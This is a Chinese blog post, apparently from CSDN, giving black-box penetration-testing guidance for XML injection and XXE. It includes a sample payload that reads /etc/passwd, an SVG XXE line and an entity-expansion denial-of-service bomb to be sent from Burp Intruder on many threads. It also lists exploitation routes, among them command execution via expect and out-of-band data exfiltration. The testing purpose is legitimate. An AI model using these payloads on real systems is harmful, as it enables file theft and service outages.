黑盒渗透测试指导之XML注入

已于 2022-06-10 14:37:12 修改
阅读量1k 收藏 2
点赞数
文章标签: 安全性测试 网络安全 web安全 xml
于 2022-06-10 13:13:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pingziaaa/article/details/125219728
版权

1654837736-8dfa3c9f7c7e63c.jpg

一.攻击场景

流星资源网,各类源码,游戏源码,QP源码

  • 直接发送XML请求
  1. 描述

    许多应用系统或组件均需要发送xml请求(get或post请求)到后台进行处理,通过识别前台发送至后台的xml请求,并使用代理拦截工具截取请求,利用XXE攻击方法修改xml请求体进行测试,

测试方法

首先查找直接发送xml请求的链接,例如抓到以下链接,如,https://127.0.0.1:8443/test/test.action其提交的post参数中有以下参数,如:

req=<?xml version="1.0" encoding="UTF-8">

<employees>

<employee>

<name>bcbccb.cn</name>

<sex>m</sex>

<age>30</age>

</employee>

</employees>

从参数体可以看出发送请求的内容是xml格式,这时如果系统支持回显那么可以发送以下请求:

<?xml version="1.0" encoding="UTF-8">

<!DOCTYPE mytest[

<!ELEMENT secret ANY>

<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<secTest>&xxe;</secTest>

<employees>

<employee>

<name>bcbccb.cn</name>

<sex>m</sex>

<age>30</age>

</employee>

</employees>

这时可在页面中显示linux服务器中的passwd文件的内容,导致操作系统的用户名等敏感信息的泄露。

举一反三,如果你能知道某文件的绝对路径,则可查看任意文件内容。

  • 上传xml文件

  1. 描述

    许多设备允许上传xml格式的配置文件进行固件升级,如果后台代码没有做任何过滤直接解析上传的xml配置文件,那么容易导致xml注入,利用xml注入发送超大字符串进行拒绝服务攻击,最终导致设备瘫痪。

2.测试方法

遍历系统功能有所查找可上传xml格式的功能模块,随意上传一个xml,用代理拦截工具,如burpsuite进行拦截,并修改xml内容为超大字符串,如以下代码:

<?xml version="1.0" encoding="UTF-8">

<!DOCUMENT something[

<!ENTITY x0 "Developers!">

<!ENTITY x1 "&x0;&x0;">

<!ENTITY x2 "&x1;&x1;">

.......

<!ENTITY x100 "&x99;&x99;">]>

<something>&x100;</something>

用burpsuite把请求发送到intruder,启动127个线程发送大量请求。

最终查看设备是否被访问变慢,是否被拒绝服务攻击了。

  • webservice接口
  1. 描述

    由于webservice接口传输的数据主要是xml数据,因此只要前台发送xml请求,后台处理xml请求就有可能存在xml注入。

  2. 测试方法

    除了使用如appscan,AWVS等工具进行扫描之外,还可以使用soapui之类的调试webservice的工具进行手动发送测试数据,测试方法其实和上述xml注入场景差不多,都是在发送到服务端的xml数据中插入攻击数据。

    如,插入新数据,绕过登录,发送长数据造成DDOS

  • 上传svg文件

某网站存在上传svg文件场景。

这时可以拦截请求,修改请求信息,插入以下代 码形成XXE注入攻击。

<!DOCUMENT svg[<!ENTITY test SYSTEM \"file:///etc/passwd\">]>

  • 直接发送包含RSS文件的请求

    RSS基于xml标准,是在互联网上被广泛采用的内容包装和投递协议。RSS(Really Simple Syndication)是一种描述和同步网站内容的格式,是使用最广泛的xml应用。

    某网站,允许用户使用自定义的RSS,通过在文件中引用外部实体,可造成XXE攻击。

  • XEE(XML实体膨胀)

    主要试图通过消耗目标程序的服务器环境来进行dos攻击。这种攻击通过在xml的DOCTYPE中创建自定义实体的定义实现,比如这种定义可以在内存中生成一个比xml的原始允许大小大出很多的xml结构,来使这种攻击得以消耗网络服务器正常有效运行的必须内存资源。

    如,添加如下代码:

    <!DOCTYPE root[<!ENTITY test "TestString">]>

    上传后,系统返回错误,回显显示TestString

    上传dos攻击脚本,如这种:

<!ENTITY x1 "&x0;&x0;">

<!ENTITY x2 "&x1;&x1;">

.......

<!ENTITY x100 "&x99;&x99;">]>

观察后台cpu占用率超过100%导致系统重启。

二.影响

可能导致越权添加数据,绕过登录。另外,可能导致应用系统被拒绝服务攻击,服务器信息泄露等等。

XXE利用方式,供参考:

  1. 使用file协议访问/dev/random或/dev/zero,进行拒绝服务攻击

  2. 上传xml解析炸弹,进行拒绝服务攻击

  3. 通过file协议访问根目录来目录枚举

  4. 通过http协议访问ip+port,进行端口内网扫描探索

  5. 通过jar协议造成文件上传动作

  6. 通过expect协议执行任意命令

  7. 通过http协议外带数据

  8. 利用php协议外带数据

  9. 利用ftp协议外带数据

  10. 利用gopher协议外带数据

 

pingziaaa
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web安全测试(四):XML注入和代码注入
ml202187的博客
08-29 984
**通过本章节,我们会学到:** 1. XML注入概念 2. 了解什么是XML注入漏洞 3. 了解XML注入漏洞产生的原因 4. XML注入漏洞检测与防护 5. 掌握XML注入漏洞的利用方式 6. 掌握如何修复XML注入漏洞 7. 代码注入概念 8. 代码注入的类型及防御
流星蝴蝶剑全教程.zip
01-13
本资源来自流星资源网交流群。是十多年来流星单机MOD发展的全部整合,文件中的内容有新有旧,覆盖面很广,把流星单机所需要的技术的最基本教程都涵盖了,本文件中的教程只是基础
web渗透测试----23、XML外部实体注入--(1)XXE原理
七天
03-05 1766
XML外部实体注入漏洞
手把手教你使用 Spring IOC 容器完成注入操作(xml注入 + 注解注入
最新发布
2401_83916394的博客
04-21 790
M —— modal 模型层(实体类)V —— views 视图层 (界面)C —— controller 控制层 (用来完执行一些操作)这三层架构各自分工,独自完成相对应的功能,但是这样的程序写出来会导致程序之间耦合性过高。
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
01-11 8010
【BP靶场portswigger-服务端10-XML外部实体注入(XXE注入)】9个实验-万文详细步骤
渗透测试-xml注入以及xxe漏洞
lza20001103的博客
07-20 1019
渗透测试-xml注入以及xxe漏洞
测试技巧之黑盒测试测试什么?
03-23
可编辑字段的检查和确认在所有可编辑字段中的有效、无效字符/字符串数据在字段中有效的最小/最大/中间范围的数据 可编辑字段的检查和...字段的检查 检查所有的测试/警告和错误信息、对话框中的拼写
实验五 黑盒测试实验二 指导书1
08-04
【实验五 黑盒测试实验二 指导书1】是关于软件测试的一个实践教程,主要关注黑盒测试方法的应用。实验目的是让学生掌握黑盒测试的策略,了解随机测试和白盒测试的优缺点,并熟悉JUnit测试框架。实验内容包括随机测试...
实验四 黑盒测试实验一 指导书1
08-04
实验四的目的是让学生掌握黑盒测试中的等价类划分和边界值分析方法,以及如何将这两种方法综合应用于测试用例设计。黑盒测试关注的是软件的功能行为,而非内部结构。在本实验中,有两个主要的测试任务:NextDate程序...
黑盒测试实验报告word文件
06-18
软件质量保证与测试黑盒测试实验报告,仅个人作品,不保证完全正确。
软件测试技术之:白盒测试黑盒测试
03-23
白盒测试黑盒测试 目录 1.软件测试基本分类...1 2....软件测试基本分类 一般地,我们将软件测试活动分为以下几类:黑盒测试、白盒测试、静态测试、动态测试、手动测试、自动测试等等。 黑盒测试
Spring与IoC系列三:基于XML的依赖注入测试程序di.rar
07-25
基于XML的依赖注入测试程序,配合博客资源学习。是基于XML的依赖注入方法的测试程序!
一步步实现Spring框架(二)XML注入
04-28
实现了XML注入Bean,为bean注入bean,构造注入,Map,List,Set,Property 注入
XML内容注入
weixin_42299862的博客
03-07 1437
一、介绍 XML注入主要分为内容注入和实体注入。 内容注入分为XML数据注入、样式表注入、XPATH/XQuery注入。 二、前提条件:有入口用户可修改XML 三、初步测试步骤 (1)检查系统设计文档/代码飞检/访谈,检查服务器文件,收集出所有的XML存储文件 (2)检查所有XML存储文件的外部输入位置(如web页面输入或修改参数值的位置),通过burpsuit绕过客户端校验,使提交的参数值包含&...
(39.3)【XML漏洞专题】XML注入——查找、注入、防止SOAP
08-20 2031
XML漏洞专题】XML注入——查找、注入、防止SOAP
XML 注入
发哥微课堂
06-15 8006
0x00:简介 首先先简单的说一下 xml,看一下它的全名称,叫 Xtensible Markup Language,即可扩展的标记语言,可直接理解为内容可自定义扩展,标签可自定义扩展。其实就是一个文本格式的文件,以 xml 结尾,里面的标签内容可以自定义。它具有很清晰的层次结构,便于阅读,经常被用来做配置文件和存储数据。web 中用 xml 格式来传输数据和处理的功能也有很多。而后端没有对 x...
【愚公系列】2023年05月 Web渗透测试XML攻击
热门推荐
时光隧道
08-25 5万+
XML攻击是一种利用XML文件中的漏洞攻击系统的攻击方法。攻击者可以通过构造恶意的XML文件,使系统解析XML文件时受到攻击,导致系统崩溃、泄漏敏感信息等安全问题。XML攻击的常见类型包括XML注入攻击、XXE攻击、XPath注入攻击等。为防范XML攻击,可以采用严格的XML解析方式、限制外部实体引用等安全措施。
网络安全web漏洞-xml外部实体注入(XXE)
ZL_1618的博客
01-06 1148
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
软件测试关键技术试验参考指导书.doc
12-15
软件测试关键技术试验参考指导书.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pingziaaa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值